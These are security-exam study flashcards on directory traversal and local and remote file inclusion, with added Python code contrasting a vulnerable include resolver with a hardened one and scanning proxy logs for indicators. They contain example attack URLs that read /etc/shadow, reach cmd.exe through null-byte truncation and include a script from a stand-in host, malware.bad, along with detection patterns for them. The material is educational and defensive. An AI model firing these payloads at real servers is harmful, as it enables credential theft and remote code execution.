Section 19.180 Directory Traversal Attack Flashcards

Objective 2.4 Given a scenario, you must be able to analyse indicators of malicious activity

1
Q

Directory Traversal Attack

A

An injection attack occurs when the attacker inserts malicious input through an application interface; a directory traversal is one such attack, aimed at the file system

■ Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory

Example of a URL an attacker may use to reach such a file:

● http://diontraining.com/../../../../etc/shadow
● Unix systems use ../
● Windows systems use ..\ by default but may also accept the Unix-like ../

■ Directory traversals may be used to read any file on the system that the web server's account has permission to access

WARNING
■ Attackers may use encoding to hide directory traversal attempts (%2e%2e%2f represents ../, and it may be encoded a second time as %252e%252e%252f to slip past a filter that decodes only once)

If you're running a web server, whether on Windows, Mac, Linux, Unix, or some other operating system, there is going to be a folder on it called the web document root. Essentially that folder is where the server goes to find the files when you browse to diontraining.com. Now that isn't the root of your hard drive, it's just the root of that directory, and there are many folders above it. So if I went to something like
diontraining.com/../../../../etc/shadow,
that would try to go and find the shadow file. Now, that shadow file isn't inside the web root; it's located somewhere else on the file system, further up the directory tree. And so what we're doing with that ../../../../ is a directory traversal.

2
Q

File Inclusion

A

Web application vulnerability that allows an attacker either to download a file
from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor

3
Q

File Inclusion - 2 different flavours

1 Remote File Inclusion

A

An attacker passes the URL of a file hosted on a server they control as a parameter, and the web app fetches and includes (executes) that remote file

○ https://diontraining.com/login.php?user=http://malware.bad/malicious.php

So if I use something like https://diontraining.com/login.php, that part is fine. Then I have ?user=, which passes the parameter of which user I want to log in as. Now, what user am I going to log in as? Am I going to log in as Jason? No, we're going to log in as http://malware.bad/malicious.php. So we're passing this parameter, and when the application goes to load whatever that parameter names, it loads this malicious script instead. That is the idea of a remote file inclusion: we're including this remote file, malicious.php, from another website into my web server using this type of request.

4
Q

File Inclusion - 2 different flavours

2 Local File Inclusion

A

An attacker makes the web app include a file that already exists on the hosting server (including one the attacker uploaded earlier)

○ https://diontraining.com/login.php?user=../../Windows/system32/cmd.exe%00

■ Logs containing ../ pertain to directory traversals

○ To prevent directory traversals and file inclusion attacks, use proper input validation: allow-list the expected parameter values and verify that the resolved path stays inside the intended directory

So let's say on my website we allow you to upload something like a picture, a PDF, or other files as part of our community forum. Well, then you could reference that file, because it's already sitting on my server. In this case you would do something like https://diontraining.com/login.php?user= and then the directory traversal you see here:
../../Windows/system32/cmd.exe%00. Now, what are they trying to do? This assumes I have a Windows server: they're trying to go up two directories, into the Windows directory, down into System32, and run the command shell. That way they can run any program they want that executes in DOS or Windows. Now what is that %00 at the end? Well, that's a common tactic used
to insert a null character at the end of the URL. That %00 in URL encoding is essentially a null character. It's being used
to bypass the security mechanism that would normally append .php to the end of the request,
so the request ends at that .exe extension instead.
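As an added example (not from the course material), the following Python script places the vulnerable include pattern beside a hardened version of the same parameter handling. It assumes a Unix web server with document root /var/www/html and per-user include files under /var/www/html/users/<name>.php; neither path appears on the page, they are assumptions for the example.

```python
"""Vulnerable vs hardened resolution of a user-controlled include parameter.

Added example, not Dion Training code. WEB_ROOT and the users/ include
directory are assumptions; the page only shows the login.php?user=... URL.
"""
import posixpath
import re
import urllib.parse

WEB_ROOT = "/var/www/html"                        # assumed document root
INCLUDE_DIR = posixpath.join(WEB_ROOT, "users")   # assumed include directory
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")      # allow-list for the user parameter


def vulnerable_include_path(user_param: str) -> str:
    """Mirrors the buggy pattern include($dir . $_GET['user'] . '.php'):
    the attacker's ../ segments are honoured and the path leaves the web root.
    A runtime that truncates strings at NUL (old PHP did) would also drop the
    appended .php when the parameter ends in %00, which is the cmd.exe trick."""
    decoded = urllib.parse.unquote(user_param)
    return posixpath.normpath(posixpath.join(INCLUDE_DIR, decoded + ".php"))


def safe_include_path(user_param: str) -> str:
    """Hardened version: decode once, reject NUL, allow-list the name, and
    still verify that the normalised path stays under INCLUDE_DIR."""
    decoded = urllib.parse.unquote(user_param)
    if "\x00" in decoded:
        raise ValueError("null byte in parameter")        # blocks the %00 trick
    if not NAME_RE.fullmatch(decoded):
        raise ValueError("parameter is not a plain user name")
    candidate = posixpath.normpath(posixpath.join(INCLUDE_DIR, decoded + ".php"))
    # Defence in depth: even if the allow-list is loosened later, refuse
    # anything that normalises to a location outside the include directory.
    if posixpath.commonpath([INCLUDE_DIR, candidate]) != INCLUDE_DIR:
        raise ValueError("path escapes the include directory")
    # On a live server, also resolve symlinks with os.path.realpath before the
    # containment check; omitted here so the example runs without the files.
    return candidate


def try_safe(user_param: str) -> str:
    """Return the resolved path, or the rejection reason as a string."""
    try:
        return safe_include_path(user_param)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    samples = [
        "jason",
        "../../../../etc/shadow",
        "..%2F..%2FWindows/system32/cmd.exe%00",
    ]
    for p in samples:
        print(f"{p!r:45} vulnerable -> {vulnerable_include_path(p)!r}")
        print(f"{'':45} safe       -> {try_safe(p)}")
```

The allow-list alone already stops every input shown on the page; the containment check is there so that a later relaxation of the regex (say, to allow subdirectories) cannot silently reopen the traversal.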

5
Q

Exam tip

A

Anytime you see something with ../, I want you to think directory traversal. That is most likely going to be the answer.

The reason is that the exam brings up the idea of directory traversal a lot. You might also get some questions about local file inclusion, and if so, remember that a local file inclusion is a type of directory traversal. You won't get a question where answer A is directory traversal and answer B is local file inclusion; they won't do that to you. Instead, one question will offer directory traversal and another might offer local file inclusion, so if you see ../, it's one of those two. On the exam you'll also be asked to look at logs, such as proxy server logs, and you'll see these URLs inside them. As you look through them, anytime you see that ../, remember that it is a directory traversal, and that will be the right answer for you.
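As an added example (not part of the course material), the following Python script applies that tip to a handful of constructed proxy log lines. It URL-decodes each request repeatedly, so that the encoded and double-encoded forms from the earlier warning (%2e%2e%2f and %252e%252e%252f) collapse to ../, folds ..\ to ../, and flags directory traversal, null bytes, double encoding, and a query parameter whose value is itself a URL (the remote file inclusion pattern). The log line format (time, client, method, URL, status) and the client addresses are assumptions made for the example.

```python
"""Triage of proxy-log URLs for directory-traversal and file-inclusion
indicators. Added example, not Dion Training code. SAMPLE_LOG is constructed
for the example and its whitespace-separated format is an assumption."""
import re
import urllib.parse

SAMPLE_LOG = """\
10:01:02 10.0.0.5 GET http://diontraining.com/index.php 200
10:01:07 10.0.0.9 GET http://diontraining.com/../../../../etc/shadow 403
10:01:09 10.0.0.9 GET http://diontraining.com/login.php?user=%2e%2e%2f%2e%2e%2fetc%2fpasswd 200
10:01:11 10.0.0.9 GET http://diontraining.com/login.php?user=..%252f..%252fetc%252fpasswd 200
10:01:14 10.0.0.9 GET http://diontraining.com/login.php?user=..%5c..%5cWindows%5csystem32%5ccmd.exe%00 500
10:01:20 10.0.0.5 GET http://diontraining.com/login.php?user=jason 200
10:01:25 10.0.0.7 GET http://diontraining.com/login.php?user=http://malware.bad/malicious.php 200
"""

# A "../" anywhere in the decoded URL is the indicator the page tells you to
# look for; backslashes are folded to "/" first so "..\" is caught too.
TRAVERSAL_RE = re.compile(r"\.\./")
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "//")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double encoding (%252e -> %2e -> .) still
    collapses; stops as soon as another round changes nothing."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(url: str) -> list:
    """Return the indicator names found in one request URL, in a fixed order."""
    findings = []
    decoded = fully_decode(url).replace("\\", "/")
    if TRAVERSAL_RE.search(decoded):
        findings.append("directory traversal")
    if "\x00" in decoded:
        findings.append("null byte")
    if urllib.parse.unquote(url) != fully_decode(url):
        findings.append("double encoding")   # a single decode was not enough
    # Remote file inclusion: a query parameter whose value is itself a URL.
    query = urllib.parse.urlsplit(url).query
    for _name, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        if fully_decode(value).lower().startswith(REMOTE_SCHEMES):
            findings.append("remote file inclusion")
            break
    return findings


def scan_log(log_text: str) -> list:
    """Return (client, url, findings) for every line with at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue                        # skip blank or malformed lines
        _time, client, _method, url, _status = fields[:5]
        findings = classify(url)
        if findings:
            hits.append((client, url, findings))
    return hits


if __name__ == "__main__":
    for client, url, findings in scan_log(SAMPLE_LOG):
        print(f"{client:10} {', '.join(findings):40} {url}")
```

The decode-until-stable loop is what makes the earlier warning actionable: a filter that decodes once sees "..%2f" in the double-encoded line and misses it, while the loop reduces it to "../" before the match.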
